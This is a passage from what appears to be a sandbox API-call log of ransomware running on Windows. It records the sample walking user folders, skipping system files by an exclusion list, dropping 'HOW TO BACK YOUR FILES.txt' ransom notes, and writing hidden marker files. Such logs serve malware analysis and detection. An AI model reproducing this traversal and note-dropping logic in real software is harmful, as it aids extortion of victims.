(lpString1="macromedia.com", lpString2="ids.txt") returned 1 [0057.437] lstrcmpiW (lpString1="macromedia.com", lpString2="NTUSER.DAT") returned -1 [0057.437] lstrcpyW (in: lpString1=0x30aeb18, lpString2="macromedia.com" | out: lpString1="macromedia.com") returned="macromedia.com" [0057.437] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0057.437] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8e) returned 0xc85d28 [0057.437] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc66308 [0057.437] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53ed8d1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f0003, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f0003, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="macromedia.com", cAlternateFileName="MACROM~1.COM")) returned 0 [0057.437] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0057.437] lstrcpyW (in: lpString1=0x30aeb18, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.437] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.438] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.438] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.438] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.438] CloseHandle (hObject=0x2b8) returned 1 [0057.438] CloseHandle (hObject=0x2c4) returned 1 [0057.438] GetCurrentThreadId () returned 0xfa8 [0057.438] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0057.438] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0057.438] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc85d28 | out: hHeap=0xc50000) returned 1 [0057.438] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0057.438] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0057.438] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" [0057.438] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.BFC0E91B00AE8A0620D3" [0057.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.451] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.454] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.454] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.454] CloseHandle (hObject=0x2c4) returned 1 [0057.455] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 70 [0057.455] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.455] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53ed8d1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f0003, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8742c9a9, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73248 [0057.455] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.455] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.455] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.455] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.455] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53ed8d1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f0003, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8742c9a9, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.455] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.455] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.455] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.455] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.455] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.455] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8742c9a9, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8742c9a9, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8742c9a9, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.455] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.455] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.455] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53eec6a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f271c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f271c, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="support", cAlternateFileName="")) returned 1 [0057.455] lstrcmpiW (lpString1="support", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0057.455] lstrcmpiW (lpString1="support", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.455] lstrcmpiW (lpString1="support", lpString2="Tiger4444.exe") returned -1 [0057.455] lstrcmpiW (lpString1="support", lpString2=".") returned 1 [0057.455] lstrcmpiW (lpString1="support", lpString2="..") returned 1 [0057.455] lstrcmpiW (lpString1="support", lpString2="windows") returned -1 [0057.455] lstrcmpiW (lpString1="support", lpString2="bootmgr") returned 1 [0057.456] lstrcmpiW (lpString1="support", lpString2="pagefile.sys") returned 1 [0057.456] lstrcmpiW (lpString1="support", lpString2="boot") returned 1 [0057.456] lstrcmpiW (lpString1="support", lpString2="ids.txt") returned 1 [0057.456] lstrcmpiW (lpString1="support", lpString2="NTUSER.DAT") returned 1 [0057.456] lstrcpyW (in: lpString1=0x30aeb36, lpString2="support" | out: lpString1="support") returned="support" [0057.456] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0057.456] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x9e) returned 0xc611e0 [0057.456] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66328 | out: ListHead=0xc66828, ListEntry=0xc66328) returned 0xc66308 [0057.456] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53eec6a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f271c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f271c, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="support", cAlternateFileName="")) returned 0 [0057.456] FindClose (in: hFindFile=0xc73248 | out: hFindFile=0xc73248) returned 1 [0057.456] lstrcpyW (in: lpString1=0x30aeb36, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.456] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.457] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.457] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.458] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.458] CloseHandle (hObject=0x2b8) returned 1 [0057.458] CloseHandle (hObject=0x2c4) returned 1 [0057.458] GetCurrentThreadId () returned 0xfa8 [0057.458] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66328 [0057.458] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0057.458] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611e0 | out: hHeap=0xc50000) returned 1 [0057.458] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0057.458] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0057.458] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" [0057.458] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.BFC0E91B00AE8A0620D3" [0057.458] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.459] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.554] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.556] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.556] CloseHandle (hObject=0x2c4) returned 1 [0057.556] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 78 [0057.556] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.556] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53eec6a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f271c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x87452b7d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73148 [0057.556] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.556] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.556] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.556] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.557] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53eec6a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f271c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x87452b7d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.557] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.557] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.557] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.557] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.557] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.557] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87452b7d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87452b7d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x87537bb1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.557] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.557] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.557] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f271c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f4df4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f4df4, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="flashplayer", cAlternateFileName="FLASHP~1")) returned 1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2="Tiger4444.exe") returned -1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2=".") returned 1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2="..") returned 1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2="windows") returned -1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2="bootmgr") returned 1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2="pagefile.sys") returned -1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2="boot") returned 1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2="ids.txt") returned -1 [0057.557] lstrcmpiW (lpString1="flashplayer", lpString2="NTUSER.DAT") returned -1 [0057.557] lstrcpyW (in: lpString1=0x30aeb46, lpString2="flashplayer" | out: lpString1="flashplayer") returned="flashplayer" [0057.557] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66360 [0057.557] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb6) returned 0xc73f50 [0057.557] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66368 | out: ListHead=0xc66828, ListEntry=0xc66368) returned 0xc66308 [0057.557] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f271c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f4df4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f4df4, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="flashplayer", cAlternateFileName="FLASHP~1")) returned 0 [0057.557] FindClose (in: hFindFile=0xc73148 | out: hFindFile=0xc73148) returned 1 [0057.557] lstrcpyW (in: lpString1=0x30aeb46, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.557] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.561] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.562] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.562] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.562] CloseHandle (hObject=0x2b8) returned 1 [0057.562] CloseHandle (hObject=0x2c4) returned 1 [0057.562] GetCurrentThreadId () returned 0xfa8 [0057.562] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66368 [0057.562] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0057.562] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73f50 | out: hHeap=0xc50000) returned 1 [0057.562] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0057.562] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0057.562] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" [0057.562] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.BFC0E91B00AE8A0620D3" [0057.562] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.563] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.627] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.628] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.629] CloseHandle (hObject=0x2c4) returned 1 [0057.629] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 90 [0057.629] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.629] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f271c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f4df4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x87537bb1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0057.629] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.629] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.629] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.629] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.629] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f271c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f4df4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x87537bb1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.629] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.630] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.630] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.630] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.630] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.630] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87537bb1, ftCreationTime.dwHighDateTime=0x1d50d44, 